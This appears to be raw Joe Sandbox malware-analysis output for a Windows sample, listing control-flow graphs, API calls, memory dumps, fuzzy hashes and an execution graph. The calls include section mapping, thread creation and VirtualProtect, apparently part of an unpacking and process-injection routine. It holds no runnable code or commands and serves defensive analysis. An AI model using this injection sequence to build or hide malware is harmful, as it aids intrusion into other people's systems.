                            Control-flow Graph
                            • Function 40192a-4019b8; block 40192a-40195e calls 401196, Sleep, 40141a; block 401960-401968 calls 401513; block 40196d-4019b8 calls 401196
                            APIs
                            • Sleep.KERNELBASE(00001388), ref: 00401949
                            Memory Dump Source
                            • Source File: 00000000.00000002.1768768688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_n72I7qB2ss.jbxd
                            Similarity
                            • API ID: Sleep
                            • String ID:
                            • API String ID: 3472027048-0
                            • Opcode ID: e590d6087ef849e6d5dc42af1f36e43da1ae6ac463b40af5ec02edc632c7ec29
                            • Instruction ID: c9f3fcf8bcf4793f4e93774b1f3aea48b9d62e180a47635587c881d01dd95fe5
                            • Opcode Fuzzy Hash: e590d6087ef849e6d5dc42af1f36e43da1ae6ac463b40af5ec02edc632c7ec29
                            • Instruction Fuzzy Hash: 44118BB520C204EBEB006A949C61EBA33689B41324F308033FA537A1F1C53D9A13F66F

                            Control-flow Graph
                            • Function 4018fa-4019b8; block 4018fa-40195e calls 401196, Sleep, 40141a; block 401960-401968 calls 401513; block 40196d-4019b8 calls 401196
                            APIs
                            • Sleep.KERNELBASE(00001388), ref: 00401949
                              • Part of subcall function 00401513: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
                              • Part of subcall function 00401513: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD
                            Memory Dump Source
                            • Source File: 00000000.00000002.1768768688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_n72I7qB2ss.jbxd
                            Similarity
                            • API ID: CreateDuplicateObjectSectionSleep
                            • String ID:
                            • API String ID: 4152845823-0
                            • Opcode ID: 4f455529237ed37661ab323116e9dd70b25b96b1891abafaa669d2a166d89a0c
                            • Instruction ID: b7e75c0626d3bb27724d4ec46791fa532c83bfb7d8b633e26b51f8edd18e17c4
                            • Opcode Fuzzy Hash: 4f455529237ed37661ab323116e9dd70b25b96b1891abafaa669d2a166d89a0c
                            • Instruction Fuzzy Hash: 8D0169F520C204EBEB006A959C61E7A32A89B40314F308433BA53791F1D57D9A13F66F

                            Control-flow Graph
                            • Function 401906-4019b8; block 401906-40195e calls 401196, Sleep, 40141a; block 401960-401968 calls 401513; block 40196d-4019b8 calls 401196
                            APIs
                            • Sleep.KERNELBASE(00001388), ref: 00401949
                              • Part of subcall function 00401513: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
                              • Part of subcall function 00401513: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD
                            Memory Dump Source
                            • Source File: 00000000.00000002.1768768688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_n72I7qB2ss.jbxd
                            Similarity
                            • API ID: CreateDuplicateObjectSectionSleep
                            • String ID:
                            • API String ID: 4152845823-0
                            • Opcode ID: f2aa24b159777525133b0c37544b8da22a58b02743232fac7b49631ece76fc28
                            • Instruction ID: d22cbc81ffad1bf36218d88fcd010809f3a6372a226c5372991517933d0026e7
                            • Opcode Fuzzy Hash: f2aa24b159777525133b0c37544b8da22a58b02743232fac7b49631ece76fc28
                            • Instruction Fuzzy Hash: B0018CB5608100EBEB005AA18861BBA33A89B55310F308537FA53791F5C53D9A13EB2F

                            Control-flow Graph
                            • Function 401937-4019b8; entry block 401937-40193b branches to 401925-401939 or 40193c-40195e (calls 401196, Sleep, 40141a); block 401960-401968 calls 401513; block 40196d-4019b8 calls 401196
                            APIs
                            • Sleep.KERNELBASE(00001388), ref: 00401949
                            Memory Dump Source
                            • Source File: 00000000.00000002.1768768688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_n72I7qB2ss.jbxd
                            Similarity
                            • API ID: Sleep
                            • String ID:
                            • API String ID: 3472027048-0
                            • Opcode ID: 23a7989e7a2524b76de4928b01830f2bcda93d6fb81d10b9735e2ff1c3c734ba
                            • Instruction ID: 58f7e284f65f0deed68c1957b19a6c9fa897bc81c1ad5f596fd0fc14cb75afb8
                            • Opcode Fuzzy Hash: 23a7989e7a2524b76de4928b01830f2bcda93d6fb81d10b9735e2ff1c3c734ba
                            • Instruction Fuzzy Hash: 15018FB6608204E7EB005A94D861EBA32289B41321F208137FA23791F5C53D8A13E76B

                            Control-flow Graph
                            • Function 401926-4019b8; block 401926-40195e calls 401196, Sleep, 40141a; block 401960-401968 calls 401513; block 40196d-4019b8 calls 401196
                            APIs
                            • Sleep.KERNELBASE(00001388), ref: 00401949
                              • Part of subcall function 00401513: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
                              • Part of subcall function 00401513: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD
                            Memory Dump Source
                            • Source File: 00000000.00000002.1768768688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_n72I7qB2ss.jbxd
                            Similarity
                            • API ID: CreateDuplicateObjectSectionSleep
                            • String ID:
                            • API String ID: 4152845823-0
                            • Opcode ID: adca0762ce3db872b76960727b6724d0b95666fb2f7ba4eb884b2811624206fc
                            • Instruction ID: 96766bc7df1ac7ff96305ad3f9c1d052b76615a330d402c70b0abf72a80acf22
                            • Opcode Fuzzy Hash: adca0762ce3db872b76960727b6724d0b95666fb2f7ba4eb884b2811624206fc
                            • Instruction Fuzzy Hash: 40014BB5208105E7EB006E959861EBA33689B45314F308533BA53791F1C53D8A13FB2F
                            APIs
                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0065E7D0
                            Memory Dump Source
                            • Source File: 00000000.00000002.1769088650.000000000065B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0065B000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_65b000_n72I7qB2ss.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocVirtual
                            • String ID:
                            • API String ID: 4275171209-0
                            • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                            • Instruction ID: 1cd655e2372a05dade006ac7480a72809c04cb43afa921d36d0cdc4970f7b7a0
                            • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                            • Instruction Fuzzy Hash: F3113F79A00208EFDB01DF98C985E98BFF5AF08351F158094F9489B361D371EA54DF90
                            APIs
                            • Sleep.KERNELBASE(00001388), ref: 00401949
                              • Part of subcall function 00401513: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
                              • Part of subcall function 00401513: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD
                            Memory Dump Source
                            • Source File: 00000000.00000002.1768768688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_n72I7qB2ss.jbxd
                            Similarity
                            • API ID: CreateDuplicateObjectSectionSleep
                            • String ID:
                            • API String ID: 4152845823-0
                            • Opcode ID: 5209ebee30330765688d0b4a9a44bb5409681334373931677855da3aedfd269d
                            • Instruction ID: c6131c3a50a378ccb7249bf603a143f64ac18458d27712ce8a7102c0a8bf1339
                            • Opcode Fuzzy Hash: 5209ebee30330765688d0b4a9a44bb5409681334373931677855da3aedfd269d
                            • Instruction Fuzzy Hash: 03011DB5208105E7EB006E95D861E7E33699B44315F308537BA53791F5C63D8A13E72F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1768940641.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5d0000_n72I7qB2ss.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: .$GetProcAddress.$l
                            • API String ID: 0-2784972518
                            • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                            • Instruction ID: f1d2a22214cb9c96db2cb5e2ffd4a563243a465545b93e2a2a3d4146318cd5f1
                            • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                            • Instruction Fuzzy Hash: D33117B6900609DFDB20CF99C884BAEBBF5FB48324F25504BD441A7351D771AA45CBA4
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1768768688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_n72I7qB2ss.jbxd
                            Similarity
                            • API ID:
                            • String ID: s
                            • API String ID: 0-453955339
                            • Opcode ID: 48b5a33bbdd50b45eb453c1d37d8e20c69ec5ddfc5d0edf0d29e9f7813fff47f
                            • Instruction ID: faf3b076d3936fe534238131b1011e071e18fe1312d7afc810a3a82cd15f20a9
                            • Opcode Fuzzy Hash: 48b5a33bbdd50b45eb453c1d37d8e20c69ec5ddfc5d0edf0d29e9f7813fff47f
                            • Instruction Fuzzy Hash: FA31776251C6819FD3160F654825A667F686B43313B2900FFC442BE2E3D63D8A06939F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1769088650.000000000065B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0065B000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_65b000_n72I7qB2ss.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: /e
                            • API String ID: 0-2837373609
                            • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                            • Instruction ID: db6c650b3de7a28d5a047664bd9819730d8fba9b1a84f7ed854550b9eb1537ff
                            • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                            • Instruction Fuzzy Hash: F5118E72340100AFDB48DF55DCC1EA673EAFB88321B298069ED08CB312E676ED42C760
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1768768688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_n72I7qB2ss.jbxd
                            Similarity
                            • API ID:
                            • String ID: j1
                            • API String ID: 0-4002328062
                            • Opcode ID: 4efd56776a1cf48e51d5b8b28f3c88fced1d5df91a33fef9abe88d0c8160b6dd
                            • Instruction ID: 7ffeeb59c018ebe80191c9150d7c44a1840aee0603b3a4286ce7f0937f8dfb2f
                            • Opcode Fuzzy Hash: 4efd56776a1cf48e51d5b8b28f3c88fced1d5df91a33fef9abe88d0c8160b6dd
                            • Instruction Fuzzy Hash: 1EF0287808838899CB02AF36C755B99FF31BF87335F78469ED9962A392C6200649C760
                            Memory Dump Source
                            • Source File: 00000000.00000002.1768768688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_n72I7qB2ss.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1a27345af654d8e993b371437472085dc99020dacbb88babffce4e4e1de5afcb
                            • Instruction ID: 0881589c7ff5ff5768f2d8d6c75c742b5463282b0ed343a47442533531e174b2
                            • Opcode Fuzzy Hash: 1a27345af654d8e993b371437472085dc99020dacbb88babffce4e4e1de5afcb
                            • Instruction Fuzzy Hash: 1D110A3A449345D9C60155278B4AB6BFB707A53730B308667D257267E18979028AE337
                            Memory Dump Source
                            • Source File: 00000000.00000002.1768768688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_n72I7qB2ss.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7679fe5b6e44f9d9bc89cc9259ef9fe0df295a63758788235af8aeaec9500c5a
                            • Instruction ID: 5e4278b07ce3c8393ea1c67bbc9533801249a46e55f2d55876e4d3ceabbd52a2
                            • Opcode Fuzzy Hash: 7679fe5b6e44f9d9bc89cc9259ef9fe0df295a63758788235af8aeaec9500c5a
                            • Instruction Fuzzy Hash: 3F016174049348D9D7016A36DB4DBA7BB21BB43320F30826BD707352C2C9B4054BE367
                            Memory Dump Source
                            • Source File: 00000000.00000002.1768768688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_n72I7qB2ss.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 55f04470bba513d6a1ff85116eb4bd7e5a7bfe650738b85bdc777e345750bb4e
                            • Instruction ID: 5e560d39f8138ce68ee94cfd6023eaf6832ac934b81d0532f16e67c5e36192ac
                            • Opcode Fuzzy Hash: 55f04470bba513d6a1ff85116eb4bd7e5a7bfe650738b85bdc777e345750bb4e
                            • Instruction Fuzzy Hash: 80018E340493848ECB029B35C71A7A9FF71BF93335F34819FC5571A6E2C6240209D751
                            Memory Dump Source
                            • Source File: 00000000.00000002.1768940641.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5d0000_n72I7qB2ss.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                            • Instruction ID: 33b62e3fa8d9d576bc60db09173d9c203964da0be1d618487df522382980e989
                            • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                            • Instruction Fuzzy Hash: 8D01A7766006048FDF31DF68C804BAB37FAFB85316F4544ABD506973C2E774A9418B90
                            Memory Dump Source
                            • Source File: 00000000.00000002.1768768688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_n72I7qB2ss.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6f6600757ac2f7f113cd3111149c0096a045daac26c52c0a983afeb1d7d6023c
                            • Instruction ID: fce5d5c764085920edf89c5c9efb60a7985776bdb309a80537f9fa9cbbd5f206
                            • Opcode Fuzzy Hash: 6f6600757ac2f7f113cd3111149c0096a045daac26c52c0a983afeb1d7d6023c
                            • Instruction Fuzzy Hash: 5DF04E7408834499DB416A36C7457A9FB21BF83320F34825FD547256D2CA74054AE711
                            Memory Dump Source
                            • Source File: 00000000.00000002.1768768688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_n72I7qB2ss.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a78d0ae9cedb3364fca3541f3adf29928ee5114118790e41c8b89e96890051af
                            • Instruction ID: 9ff9efdcd1480cc8040ea01fdd64be9b4a39a154ba86f8cede482a75e84e4065
                            • Opcode Fuzzy Hash: a78d0ae9cedb3364fca3541f3adf29928ee5114118790e41c8b89e96890051af
                            • Instruction Fuzzy Hash: 36F02B7804574859CB02AF37C7416D9FF31BE83235F74464ED4561A392C720060DC760
                            Memory Dump Source
                            • Source File: 00000000.00000002.1768768688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_n72I7qB2ss.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: fb15b2d9d84d8bcf95237442851c33c9a576287e722d5cdf4983b928f5d9cc64
                            • Instruction ID: f390e3d0f4c9bd654050140e8d70974a6db2ab88ea7c37a64fdc5b7086b4af87
                            • Opcode Fuzzy Hash: fb15b2d9d84d8bcf95237442851c33c9a576287e722d5cdf4983b928f5d9cc64
                            • Instruction Fuzzy Hash: 24E07227DC33200F87700ECDB0D60086F97B6B03233B60FAACA80333588B328C010288
                            Memory Dump Source
                            • Source File: 00000000.00000002.1768768688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_n72I7qB2ss.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f051c0fcd709177014542cd0273e44ec655c7c60457a6c32fe43c7d43ebeaafc
                            • Instruction ID: c4400a266d698cb3cd2bf7b5ca235fa4f1f280859f6ddc9359233ff16ff34d52
                            • Opcode Fuzzy Hash: f051c0fcd709177014542cd0273e44ec655c7c60457a6c32fe43c7d43ebeaafc
                            • Instruction Fuzzy Hash: B6A00249D125A384C524C50436C041C1A81305ED107689F05D180D9405F348C4C61043
                            APIs
                            • SetCalendarInfoW.KERNEL32(00000000,00000000,00000000,0042840C), ref: 004236AD
                            • OpenJobObjectA.KERNEL32(00000000,00000000,00428418), ref: 004236BA
                            • GetShortPathNameA.KERNEL32(00000000,?,00000000), ref: 004236C9
                            • Sleep.KERNEL32(00000000), ref: 004236D0
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1768787533.0000000000416000.00000020.00000001.01000000.00000003.sdmp, Offset: 00416000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_416000_n72I7qB2ss.jbxd
                            Similarity
                            • API ID: CalendarInfoNameObjectOpenPathShortSleep
                            • String ID: -
                            • API String ID: 3454512315-2547889144
                            • Opcode ID: 51237ded8cffff5c661eebe9a307697b28ab80f9e6e32791c6b23dd8faaea119
                            • Instruction ID: deacb889439696245f735b3f4471453babfeec7347a63c5168fd63d97d027ef3
                            • Opcode Fuzzy Hash: 51237ded8cffff5c661eebe9a307697b28ab80f9e6e32791c6b23dd8faaea119
                            • Instruction Fuzzy Hash: 7921A771A00128EBC7319F15EC859AE7778EB85715F4080ADE659A7241C73C4A86CF6C
                            APIs
                            • GetModuleHandleW.KERNEL32(0043A3B0), ref: 00423551
                            • GetProcAddress.KERNEL32(00000000,0042C638), ref: 0042358E
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1768787533.0000000000416000.00000020.00000001.01000000.00000003.sdmp, Offset: 00416000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_416000_n72I7qB2ss.jbxd
                            Similarity
                            • API ID: AddressHandleModuleProc
                            • String ID: $VirtualProtect
                            • API String ID: 1646373207-947944765
                            • Opcode ID: 44762ff7a82ffd8c5c1d5e0c0204e9bd3952b0c34b1168cc3fd0d8398fe7d883
                            • Instruction ID: d0582955cadd0fc5f4b94350803a6a31df697eece703d4cb31990996f5db6057
                            • Opcode Fuzzy Hash: 44762ff7a82ffd8c5c1d5e0c0204e9bd3952b0c34b1168cc3fd0d8398fe7d883
                            • Instruction Fuzzy Hash: 8E31531569C3C0D8E331CBA8BC857297B62AB15B14F54347AD9848B2F1D3FA056A836F
                            APIs
                            • GetFullPathNameW.KERNEL32(0042844C,00000000,?,00000000), ref: 00423744
                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00423760
                            • HeapCreate.KERNEL32(00000000,00000000,00000000), ref: 0042377E
                            • SetFileShortNameA.KERNEL32(00000000,00428480), ref: 0042378A
                            Memory Dump Source
                            • Source File: 00000000.00000002.1768787533.0000000000416000.00000020.00000001.01000000.00000003.sdmp, Offset: 00416000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_416000_n72I7qB2ss.jbxd
                            Similarity
                            • API ID: Name$CreateEnvironmentFileFreeFullHeapPathShortStrings
                            • String ID:
                            • API String ID: 4071102102-0
                            • Opcode ID: 741c1bccab81f8b294f72623694b2b6f52fb331087fe6a6da8c1225e30d228ee
                            • Instruction ID: 4f65d5ff727ea9b5f32b9490f161a63e31010cc474a4420f8d895bd29f22500d
                            • Opcode Fuzzy Hash: 741c1bccab81f8b294f72623694b2b6f52fb331087fe6a6da8c1225e30d228ee
                            • Instruction Fuzzy Hash: B101B1B1704124AFCB20AF69BC89D6B77BCE78971AB80503FF501D2150DA3C1945CB6E
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1768787533.0000000000416000.00000020.00000001.01000000.00000003.sdmp, Offset: 00416000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_416000_n72I7qB2ss.jbxd
                            Similarity
                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                            • String ID:
                            • API String ID: 3016257755-0
                            • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                            • Instruction ID: 79eb0d46623e3e840f5a8a74d676871430ce86260699b964cc8067b3add82cac
                            • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                            • Instruction Fuzzy Hash: 8A117232600159BBCF225E84EC01CEE3F62FB59754B998416FA1955130C63ACAB2AB89

                            Execution Graph

                            Execution Coverage:5.4%
                            Dynamic/Decrypted Code Coverage:24.6%
                            Signature Coverage:0%
                            Total number of Nodes:134
                            Total number of Limit Nodes:5
                            execution_graph 5243 423b60 5244 423b6a __cfltcvt_init 5243->5244 5247 4246c7 GetModuleHandleA 5244->5247 5246 423b6f __setdefaultprecision 5248 4246d6 GetProcAddress 5247->5248 5249 424689 5247->5249 5248->5249 5249->5246 5187 6d092b GetPEB 5188 6d0972 5187->5188 5189 401906 5190 40191c 5189->5190 5191 401941 Sleep 5190->5191 5192 40195c 5191->5192 5193 401513 7 API calls 5192->5193 5194 40196d 5192->5194 5193->5194 5126 403149 5127 403150 5126->5127 5128 4030fe RtlCreateUserThread NtTerminateProcess 5127->5128 5130 403157 5127->5130 5129 40312a 5128->5129 5131 6fbc42 5134 6fbc48 5131->5134 5135 6fbc57 5134->5135 5138 6fc3e8 5135->5138 5139 6fc403 5138->5139 5140 6fc40c CreateToolhelp32Snapshot 5139->5140 5141 6fc428 Module32First 5139->5141 5140->5139 5140->5141 5142 6fc437 5141->5142 5144 6fbc47 5141->5144 5145 6fc0a7 5142->5145 5146 6fc0d2 5145->5146 5147 6fc11b 5146->5147 5148 6fc0e3 VirtualAlloc 5146->5148 5147->5147 5148->5147 5149 402e8e 5151 402e86 5149->5151 5152 402f1f 5151->5152 5153 4018fa 5151->5153 5154 40190a 5153->5154 5155 401941 Sleep 5154->5155 5156 40195c 5155->5156 5158 40196d 5156->5158 5159 401513 5156->5159 5158->5152 5160 401522 5159->5160 5161 4015c1 NtDuplicateObject 5160->5161 5168 4016dd 5160->5168 5162 4015de NtCreateSection 5161->5162 5161->5168 5163 401604 NtMapViewOfSection 5162->5163 5164 40165e NtCreateSection 5162->5164 5163->5164 5165 401627 NtMapViewOfSection 5163->5165 5166 40168a 5164->5166 5164->5168 5165->5164 5167 401645 5165->5167 5166->5168 5169 401694 NtMapViewOfSection 5166->5169 5167->5164 5168->5158 5169->5168 5170 4016bb NtMapViewOfSection 5169->5170 5170->5168 5051 6d003c 5052 6d0049 5051->5052 5064 6d0e0f SetErrorMode SetErrorMode 5052->5064 5057 6d0265 5058 6d02ce VirtualProtect 5057->5058 5060 6d030b 5058->5060 5059 6d0439 VirtualFree 5063 6d04be LoadLibraryA 5059->5063 5060->5059 5062 6d08c7 5063->5062 5065 6d0223 5064->5065 5066 6d0d90 5065->5066 5067 6d0dad 5066->5067 5068 6d0dbb 
GetPEB 5067->5068 5069 6d0238 VirtualAlloc 5067->5069 5068->5069 5069->5057 5070 423af0 5073 42379f 5070->5073 5072 423af5 5074 4237af 5073->5074 5075 42381f GetLogicalDriveStringsW DeleteVolumeMountPointW GetCommandLineA 5074->5075 5076 42383d 5074->5076 5075->5074 5077 42384a 11 API calls 5076->5077 5078 423948 5076->5078 5081 423902 GetDefaultCommConfigA DebugBreak EnumDateFormatsW 5077->5081 5079 42394a SetCommMask GetTickCount GetSystemTimes 5078->5079 5082 42397d 5078->5082 5079->5078 5080 42397f 5079->5080 5080->5082 5083 423988 FoldStringW 5080->5083 5084 42392a 5081->5084 5085 4239a0 OpenWaitableTimerA HeapLock FormatMessageW 5082->5085 5086 423a41 GlobalAlloc 5082->5086 5083->5082 5084->5078 5095 4239ec 5085->5095 5087 423a86 LoadLibraryA 5086->5087 5088 423a5f 5086->5088 5096 423485 5087->5096 5088->5087 5092 423a9b 5101 42370a 5092->5101 5094 423aa0 5094->5072 5095->5086 5097 4234c4 5096->5097 5098 4234d0 GetModuleHandleW GetProcAddress 5097->5098 5099 4235a6 5097->5099 5098->5097 5100 423467 VirtualProtect 5099->5100 5100->5092 5102 423736 GetFullPathNameW 5101->5102 5103 42374a 5101->5103 5102->5103 5112 4235e6 5103->5112 5106 423766 5115 423635 5106->5115 5107 42375f FreeEnvironmentStringsW 5107->5106 5110 423790 5110->5094 5111 42377b HeapCreate SetFileShortNameA 5111->5110 5113 42360a GetCommProperties LoadLibraryA 5112->5113 5114 42361e 5112->5114 5113->5114 5114->5106 5114->5107 5118 423664 5115->5118 5116 4236e4 5116->5110 5116->5111 5118->5116 5119 4236a5 SetCalendarInfoW OpenJobObjectA GetShortPathNameA Sleep 5118->5119 5120 42362a 5118->5120 5119->5118 5123 4235a9 5120->5123 5124 4235c5 VirtualUnlock 5123->5124 5125 4235cf 5123->5125 5124->5125 5125->5118 5250 402fd3 5251 40312a 5250->5251 5252 402ffd 5250->5252 5252->5251 5253 4030fe RtlCreateUserThread NtTerminateProcess 5252->5253 5253->5251 5239 402e35 5241 402e6f 5239->5241 5240 402f1f 5241->5240 5242 4018fa 8 API calls 5241->5242 5242->5240 5171 6fbc37 5172 6fbc3b 5171->5172 5173 6fbc60 
5172->5173 5174 6fc3e8 3 API calls 5172->5174 5174->5173 5201 40151e 5202 40154c 5201->5202 5203 4016dd 5202->5203 5204 4015c1 NtDuplicateObject 5202->5204 5204->5203 5205 4015de NtCreateSection 5204->5205 5206 401604 NtMapViewOfSection 5205->5206 5207 40165e NtCreateSection 5205->5207 5206->5207 5208 401627 NtMapViewOfSection 5206->5208 5207->5203 5209 40168a 5207->5209 5208->5207 5210 401645 5208->5210 5209->5203 5211 401694 NtMapViewOfSection 5209->5211 5210->5207 5211->5203 5212 4016bb NtMapViewOfSection 5211->5212 5212->5203

                            Control-flow Graph

                            APIs
                            • GetLogicalDriveStringsW.KERNEL32(00000000,00000000), ref: 00423821
                            • DeleteVolumeMountPointW.KERNEL32(00000000), ref: 00423828
                            • GetCommandLineA.KERNEL32 ref: 0042382E
                            • lstrcatW.KERNEL32(?,00000000), ref: 00423853
                            • InterlockedExchange.KERNEL32(?,00000000), ref: 0042385F
                            • GetActiveWindow.USER32 ref: 00423865
                            • GetSystemWindowsDirectoryW.KERNEL32(?,00000000), ref: 00423874
                            • WriteConsoleW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0042388A
                            • IntersectRect.USER32(?,?,00000000), ref: 0042389B
                            • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 004238A4
                            • GetAtomNameA.KERNEL32(00000000,?,00000000), ref: 004238B4
                            • GlobalDeleteAtom.KERNEL32(00000000), ref: 004238BB
                            • GetCurrentConsoleFont.KERNEL32(00000000,00000000,?), ref: 004238C8
                            • SearchPathA.KERNEL32(0042852C,00428518,004284E4,00000000,?,?), ref: 004238EB
                            • GetDefaultCommConfigA.KERNEL32(00000000,?,00000000), ref: 0042390C
                            • DebugBreak.KERNEL32 ref: 00423912
                            • EnumDateFormatsW.KERNEL32(00000000,00000000,00000000), ref: 0042391B
                            • SetCommMask.KERNELBASE(00000000,00000000), ref: 0042394C
                            • GetTickCount.KERNEL32 ref: 00423952
                            • GetSystemTimes.KERNELBASE(?,?,?), ref: 00423967
                            • FoldStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0042398D
                            • OpenWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 004239AF
                            • HeapLock.KERNEL32(00000000), ref: 004239B6
                            • FormatMessageW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 004239CA
                            • GlobalAlloc.KERNELBASE(00000000), ref: 00423A48
                            • LoadLibraryA.KERNELBASE(00428574), ref: 00423A8B
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.2060637436.0000000000416000.00000020.00000001.01000000.00000005.sdmp, Offset: 00416000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_416000_ashcvvs.jbxd
                            Similarity
                            • API ID: AtomCommConsoleDeleteGlobalSystem$ActiveAllocBreakCacheCommandConfigCountCurrentDateDebugDefaultDirectoryDriveEnumExchangeFlushFoldFontFormatFormatsHeapInstructionInterlockedIntersectLibraryLineLoadLockLogicalMaskMessageMountNameOpenPathPointRectSearchStringStringsTickTimerTimesVolumeWaitableWindowWindowsWritelstrcat
